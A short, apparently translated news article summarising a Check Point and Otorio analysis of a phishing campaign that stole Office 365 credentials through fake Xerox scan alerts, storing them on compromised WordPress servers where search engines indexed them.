A new large-scale phishing campaign targeting global organizations has been found to bypass Microsoft Office 365 Advanced Threat Protection (ATP) and steal credentials belonging to more than a thousand corporate employees.
The cyber-attack is said to have taken place in August last year, targeting energy and construction companies, Check Point Research researchers said today in a joint analysis with industrial security company Otorio.
Although phishing campaigns designed to steal credentials are among the most common reasons for data breaches, what makes this mode to stand out is a functional failure that led hackers to inadvertently expose the credentials they had stolen on Internet.
"With a simple Google search, anyone could find the password of a compromised email," the researchers said.
The attack started with phishing supposedly Xerox (or Xeros) scan alerts containing an attachment HTML file, which when opened, encouraged them users to enter their Office 365 passwords on a fake login page. The passwords were then extracted and sent to one remote server in a text file.
To this end, the campaign was based on a combination of specialized infrastructure, as well as compromised servers WordPress used by attackers to store credentials.
The fact that stolen credentials were stored in specific text files on these servers also means that search engines like Google can register these pages and make them accessible to anyone malicious looking for stolen passwords with an easy search.
In addition, by analyzing the different email headers used in this campaign, the researchers came up with the conclusion that the emails were sent from a Linux server hosted on the Microsoft Azure platform.
To mitigate these threats, users are advised to be wary of emails received from unknown senders and not to click on suspicious links.
Source of information: thehackernews.com